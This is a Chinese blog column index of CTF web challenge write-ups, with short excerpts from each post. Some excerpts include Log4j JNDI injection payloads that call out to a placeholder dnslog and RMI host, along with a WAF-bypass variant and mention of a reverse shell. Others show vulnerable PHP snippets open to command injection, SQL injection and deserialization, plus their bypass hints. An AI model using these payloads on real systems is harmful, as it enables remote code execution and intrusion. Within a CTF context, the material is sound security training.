CTF_Writeup_[web]
文章平均质量分 68
keepb1ue
临渊羡鱼 不如退而结网
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
泰山杯:文件包含
convert.iconv.*过滤器的使用原创 2023-01-13 15:21:22 · 1983 阅读 · 2 评论 -
XCTF:ics-05
php伪协议 + preg_replace+/e修正符命令执行原创 2023-01-12 15:50:51 · 1512 阅读 · 0 评论 -
XCTF:NewsCenter
一道简单的常规注入题原创 2023-01-12 11:43:36 · 1778 阅读 · 0 评论 -
XCTF:cat
django编码问题配合CURLOPT_SAFE_UPLOAD导致任意文件读取php cURL CURLOPT_SAFE_UPLOADdjango DEBUG mode原创 2023-01-12 10:45:32 · 3476 阅读 · 0 评论 -
2023 Real World CTF体验赛部分Writeup
2023 Real World CTF体验赛部分Writeup原创 2023-01-09 00:00:00 · 3261 阅读 · 0 评论 -
2022gwb_web3
2022赣网杯—web3原创 2022-12-13 10:20:27 · 2860 阅读 · 0 评论 -
2022赣政杯 Writeup
2022赣政杯原创 2022-08-23 09:40:54 · 4943 阅读 · 0 评论 -
2022 Real World CTF体验赛Writeup
还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。log4flag提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp}存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}直接搭建jndi服务,尝试反弹shellflag:rwctf{d4b4b837f95542aa9原创 2022-01-23 10:00:00 · 7731 阅读 · 1 评论 -
长安“战役“网络安全卫士守护赛
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_dogeWebshiro?很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/原创 2022-01-14 10:29:21 · 2400 阅读 · 0 评论 -
某行业_CTF部分Writeup
目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality menWEB简单的Web<?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p原创 2022-01-12 10:52:06 · 8386 阅读 · 0 评论 -
PHP反序列化字符串溢出
反序列化字符串逃逸常见于CTF中,所以在这里记录下导致反序列化字符串逃逸的原因:是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE。0x01:Track在学习反序列化字符串逃逸之前,首先要了解反序列化的一些小Track:php在反序列化时,底层代码是以 ; 作为字段的分隔,以 ;} 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。class A{ public $T1 = '123'; p原创 2021-12-29 16:16:27 · 6828 阅读 · 0 评论 -
2021赣网杯网络安全大赛_部分Writeup
Web1.checkin这种游戏类题目,一般都是用js去做控制结果直接查看网页源码点到http://118.31.60.233:10000/js/game.jsCtrl+F直接搜flagflag{134791e2-d93c-4d01-a71f-dcbe82d7fe08}2.gwb-web-easypop<?phperror_reporting(0);highlight_file(__FILE__);$pwd=getcwd();class func{ pu原创 2021-12-07 11:47:01 · 15451 阅读 · 0 评论 -
极客大挑战 2019]BabySQL
地址:[极客大挑战 2019]BabySQL一个登陆框,尝试admin/admin登陆GET方式传参,测试注入测试存在过滤简单Fuzz一下测试请求过快,出现429的情况,可以配置下延时爆破出现Input your username and password都是被过滤的字符知道被过滤的字符就好办了,使用双写绕过即可。http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=原创 2021-12-03 10:39:08 · 6272 阅读 · 0 评论 -
第一届赣网杯网络安全大赛[parseHash]
打了个酱油。记录下一些web题,杂项和其他赛题网上也挺多的。由于打完没直接写,现在靶场也关了,无法逆推,所以自己修改了key值重新改了下hash。题目还是一样。源码:<?php include("key.php");class person{ public $aa; public $bb; public $username; public $password; public function __construct($key=''){原创 2020-09-12 15:51:04 · 3003 阅读 · 1 评论 -
[第四届-强网杯]:Funhash
<?phpinclude 'conn.php';highlight_file("index.php");//level 1if ($_GET["hash1"] != hash("md4", $_GET["hash1"])){ die('level 1 failed');}//level 2if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3'])){ die(原创 2020-08-24 13:26:08 · 14404 阅读 · 0 评论 -
[第四届-强网杯]:主动
源码:<?phphighlight_file("index.php");if(preg_match("/flag/i", $_GET["ip"])){ die("no flag");}system("ping -c 3 $_GET[ip]");?> 很明显的命令执行flag.php就在当前目录下,那么直接cat ./flag不就行了?可人家将flag关键字过滤了,绕过的方法也很简单;思路很简单:我们传进去的命令base64编码下,在解码执行即可?id=;c原创 2020-08-24 11:54:23 · 4450 阅读 · 0 评论 -
[第四届-强网杯]:upload
下载附件,是一个解压后是一个数据包,wireshark打开分析,很明显,这是一个文件上传的数据包,分析数据包内容:很明显,是一个文件上传的数据包。接着看看他到底上传了什么数据:很明显,是上传了一张steghide.jpg的图片那我们可以尝试着在数据包中将图片还原出来在上传图片的数据包中。指定上传流量的会话,显示和保存的数据改为原始数据,然后将其保存为:steghide.jpg接着利用WinHex从保存的原始文件中将上传的图片还原出来。将之前保存的steghide.bin用WinHex打原创 2020-08-24 11:53:23 · 4440 阅读 · 0 评论 -
[CISCN2020]-rceme
题目源码:<?phperror_reporting(0);highlight_file(__FILE__);parserIfLabel($_GET['a']);function danger_key($s) { $s=htmlspecialchars($s); $key=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session'原创 2020-08-24 11:52:47 · 4110 阅读 · 0 评论 -
[CISCN2020]-easyphp
源码:<?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); if(!pcntl_wifexited($status)){ phpinfo(); } }else{原创 2020-08-21 22:15:28 · 6687 阅读 · 5 评论 -
BUUCTF:[XDCTF 2015]filemanager
靶场地址:https://buuoj.cn/challenges#[XDCTF%202015]filemanager题目首页给出了源码:https://github.com/CTFTraining/xdctf_2015_filemanager而在这道题中也存在源码泄露:这道题主要还是考察代码审计和二次注入:网站结构源码解析:数据库结构:xdctf.sqlSET NAMES utf8;SET FOREIGN_KEY_CHECKS = 0;DROP DATABASE IF EXISTS原创 2020-08-03 17:41:19 · 3627 阅读 · 0 评论
分享